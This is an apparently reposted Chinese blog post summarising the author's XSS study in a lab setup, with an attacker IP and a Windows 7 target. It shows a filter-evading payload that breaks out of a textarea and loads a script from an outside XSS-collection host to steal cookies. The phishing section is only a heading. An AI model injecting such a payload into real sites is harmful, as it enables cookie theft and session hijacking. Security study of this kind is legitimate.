XSS这段时间的学习总结

Posted -zhong

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了XSS这段时间的学习总结相关的知识,希望对你有一定的参考价值。

0X01利用平台payload获取COOKIE

本机IP 192.168.1.100

靶机win7 192.168.1.102

我们先创建一个cookie的项目

技术图片

然后在可以执行xss的地方插入我们的恶意代码

</tExtArEa>"><sCRiPt sRC=https://xsshs.cn/JBYE></sCrIpT>

技术图片

可以看见成功回显

技术图片

0X02基础认证钓鱼

 

以上是关于XSS这段时间的学习总结的主要内容,如果未能解决你的问题,请参考以下文章

XSS基础学习

OpenGL 纹理学习总结

XSS:如何从 C# 中的字符串中删除 JS 片段?

为啥这段代码会泄露? (简单的代码片段)

编写自己的XSS接受模块

通过脚本片段绕过XSS防御